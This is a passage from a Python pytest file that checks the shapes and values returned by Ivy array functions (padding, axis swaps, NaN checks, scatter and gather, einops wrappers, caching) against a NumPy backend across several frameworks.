pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_native_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_native_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# expand_dims
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.expand_dims(x, axis)
# type test
assert ivy.is_native_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape.insert(axis, 1)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_native_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_native_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
